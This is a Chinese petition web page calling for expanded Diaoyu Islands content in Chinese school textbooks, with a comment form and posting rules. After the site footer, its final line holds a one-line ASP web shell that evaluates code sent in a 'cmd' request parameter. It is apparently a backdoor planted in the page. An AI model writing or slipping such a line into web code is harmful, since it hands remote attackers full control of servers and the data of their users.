日本国有化钓鱼岛是企图通过法律层面对钓鱼岛实施侵占!
日本修改教科书钓鱼岛内容,是企图通过教育层面对钓鱼岛实施侵占!
有正义的中华民族优秀子孙,是绝不会接受日本篡改钓鱼岛历史的事实!
希望大家参与进来一起来推动教育部对中国教科书里关于钓鱼岛内容的增补和修改。积极参与这个投票并写下你的留言,为钓鱼岛出一分力!!!

中日两国关于教科书的态度对比
日本教科书科目社会科、地理、历史、公民科等十种
中国教科书科目仅限于地理
日本的态度1、 对教科书钓鱼岛内容不断进行修改和增补。
2、 从有争议到成了固有领土。
中国的态度1、从来没有过进行过增补和修改,三言两语,轻描淡写。


我们要求:
1、中国教育部应该对教科书里关于钓鱼岛内容方面进行增补和修改。
2、中国政府应该用实际行动回击日本在钓鱼岛上的挑衅行为。


关于修改增补教科书钓鱼岛内容 强化领土海权教育的建议(提案)
呈中华人民共和国国家海洋局(陈请书)

钓鱼岛~~教科书 在这里写上您的诉求
昵称:      支持 反对       验证码:  点击获取验证码

温馨提示
  不得利用此信息页面散布谣言,扰乱社会秩序、破坏社会稳定;不得鼓动公众恶意评论他人、公开他人隐私或者通过暗示、影射等方式对他人进行人身攻击;不得公然侮辱他人或者捏造事实诽谤他人;
  严禁发表造谣,诽谤他人,煽动颠覆国家政权的言论和泄露国家机密;
  严禁发表和使用带有侮辱性及其他涉嫌威胁、挑衅、人身攻击的措辞。如有出现违反《互联网电子公告服务管理规定》及其他各项法律法规的跟帖出现,本站将立即对跟帖予以删除。

湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):